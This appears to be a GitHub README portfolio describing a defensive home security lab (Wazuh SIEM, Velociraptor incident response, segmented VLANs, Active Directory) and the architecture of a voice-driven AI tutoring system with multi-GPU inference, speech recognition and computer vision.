🟡 SIEM — Wazuh

Deployed Wazuh as the central SIEM and security monitoring platform on the Kali Purple (VLAN 20) node.

Installed Wazuh Manager, Indexer, and Dashboard as a single-node deployment
Enrolled all Windows VMs and the Domain Controller as Wazuh Agents
Configured log ingestion from Windows Event Logs and Sysmon
Built detection rules and alerts for common attack techniques (credential dumping, lateral movement, privilege escalation)
Used the Wazuh dashboard for real-time alert triage, rule tuning, and security event investigation

🟠 DFIR / Threat Hunting — Velociraptor

Deployed Velociraptor as the digital forensics and incident response (DFIR) platform, enabling live endpoint investigation and threat hunting at scale.

Configured Velociraptor Server on the security operations node (VLAN 20)
Enrolled all Windows endpoints as Velociraptor Clients
Used VQL (Velociraptor Query Language) to hunt for IOCs across endpoints simultaneously
Executed built-in artefact collections: process memory, running services, scheduled tasks, prefetch files, recently accessed files, and registry hives
Simulated incident response workflows — triage → artefact collection → timeline reconstruction

Infrastructure Skills Demonstrated

Bare-metal hypervisor installation and VM provisioning (Windows, Linux, pfSense)
VirtIO paravirtualized driver integration for storage and networking
Software-defined networking with OVS bridges and 802.1Q VLAN tagging
pfSense DHCP scope configuration and inter-VLAN routing policy
SPICE remote display protocol for optimised VM console access
Active Directory deployment — domain, users, groups, and GPO configuration
Domain-joining workstations and enforcing group policy
Full security stack deployment: Sysmon → Wazuh → Velociraptor
Simulated real-world attack scenarios and practised detection, triage, and response using the deployed tooling

Technical Skills — Artificial Intelligence

The following technical skills were developed and applied during the engineering of a voice-activated, multi-GPU Intelligent Tutoring System (project under NDA). Each section reflects hands-on, production-validated knowledge extracted from the project's architecture. Skills are organized by engineering domain and focus on the high-level architectures, frameworks, and logic structures utilized to build the system.

Multi-GPU Orchestration: Implemented automated tensor distribution to efficiently split massive model weights across an 8-GPU server array.
Memory Optimization: Utilized precision quantization techniques (torch.bfloat16) to halve the memory footprint while retaining inference accuracy.
Inference Control: Built custom heuristic stopping criteria to forcefully halt text generation at natural sentence boundaries, preventing "run-on" model hallucinations.
Asynchronous Execution: Wrapped synchronous generation blocks in asynchronous thread-pooling loops to prevent the LLM from blocking the main API thread during high-latency generation.

2. Voice AI & Audio Processing Pipeline

Whisper STT | SpeechRecognition | pyttsx3

Architected a "perpetually-on" ambient audio client capable of handling dynamic real-world environments without user frustration.

Acoustic Trigger Optimization: Engineered phonetic fallback logic to capture trigger-words across diverse accents and speech-to-text misinterpretations.
Cloud-Accelerated STT: Integrated high-speed audio transcription APIs for sub-second, highly accurate voice-to-text conversion.
ASR Artifact Mitigation: Developed semantic blacklist logic to detect and drop pure-silence hallucinations inherent to specific STT models (e.g., dropping phantom closed-captioning artifacts).
Dynamic Listening Windows: Programmed custom timestamp-based sliding timers, allowing multi-turn conversations without forcing the user to repeatedly trigger the wake-word.

3. Backend API Development & State Management

FastAPI | Pydantic | Uvicorn

Built a robust, asynchronous REST API to serve as the central orchestrator between the audio client, the LLM, and the database.

Contextual State Management: Designed an API that tracks shifting user states (e.g., transitioning between informational delivery and assessment modes), dynamically altering the backend routing logic based on the conversational phase.
Data Validation: Utilized strict schema validation decorators to enforce allowed API parameters, ensuring robust payload handling.
Resource Management: Offloaded VRAM garbage collection and session cleanup routines to asynchronous background tasks, ensuring zero latency for the end-user.

4. Edge AI & NLP Intent Classification

Small Language Models (SLMs) | Local NLP Filtering

Implemented edge-computing strategies to reduce cloud API compute costs and eliminate false system triggers from background noise.

Local Intent Pre-processing: Deployed lightweight zero-shot classification models locally on the client machine to act as a primary NLP filter.
Semantic Noise Dropping: Configured the local model to analyze incoming audio transcriptions in real-time, assigning confidence scores to distinguish "actual domain-specific inquiries" from "casual background chatter," silently dropping the latter before it consumes server compute.

5. Advanced Prompt Engineering & Algorithmic Routing

Context Injection | Behavioral Prompting | Multimodal Logic

Demonstrated advanced mastery of guiding LLM behavior through dynamic, multi-layered system prompts to create a structured educational AI rather than an open-ended chatbot.

Dynamic Intent Routing: Engineered logic to intercept specific user intents and dynamically restructure the LLM's system instructions on the fly, transitioning the model between instructional states and objective assessment states.
Bias-Mitigated Evaluation: Built constraint frameworks that force the LLM to objectively analyze user inputs, correct misconceptions without conversational sycophancy, and output deterministic evaluation flags for backend parsing.
Multimodal Context Integration: Hooked the prompt pipeline to read real-time computer vision outputs (via local object detection logs), giving the LLM spatial awareness of objects the user is physically interacting with in XR/wearable environments.

6. Persistent Memory & Data Engineering

JSON | File I/O | Context Window Optimization

Solved the "Context Window" limitations of LLMs by decoupling long-term data storage from short-term prompt memory.

Persistent Session Logging: Engineered backend logic to continuously append user conversation logs to dedicated persistent profiles on the server disk.
Context Shielding: Implemented dynamic array slicing techniques to ensure that while the database stores infinite history, the active LLM prompt is strictly capped at recent interactions, preventing Out-of-Memory (OOM) crashes and maintaining high-speed inference.
Adaptive Progression Tracking: Built logic to automatically update quantitative user profiles based on real-time algorithmic evaluations, enabling dynamic difficulty scaling and targeted repetition for future interactions.

7. Computer Vision & Real-Time Tracking Pipeline

Ultralytics YOLO | MediaPipe | OpenCV | Flask

Engineered a low-latency, multi-model computer vision pipeline capable of capturing, analyzing, and broadcasting live visual data to bridge physical user environments with the NLP backend.

Multi-Model Inference Architecture: Architected a concurrent processing loop that runs Google’s MediaPipe (for complex skeletal hand-tracking and kinematic landmark detection) alongside a custom-trained Ultralytics YOLO model (for domain-specific object detection) on a unified frame state.
Dynamic ROI Screen Scraping: Bypassed restrictive hardware APIs by developing a dynamic screen-capture engine. Utilized coordinate-based Region of Interest (ROI) extraction to isolate specific mirrored application windows, drastically reducing the pixel-processing overhead fed into the neural networks.
Hardware-Accelerated Processing: Configured PyTorch environments to dynamically assign tensor calculations to CUDA-enabled GPUs, ensuring the YOLO inference engine maintained high framerates without thermal throttling or bottlenecking the main execution thread.
Live Telemetry & MJPEG Streaming: Developed a multithreaded Flask web application to encode processed OpenCV matrices (BGR to RGB) into JPEG byte streams. Broadcasted the annotated feed via HTTP multipart responses, allowing remote, low-latency monitoring of the AI's visual field.
Visual Annotation & Data Extraction: Utilized OpenCV to programmatically superimpose bounding boxes, confidence scores, and multi-point hand connections directly onto the live feed, while simultaneously extracting the raw classification strings for downstream processing and Inter-Process Communication (IPC).

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md

Folders and files

Latest commit

History

Repository files navigation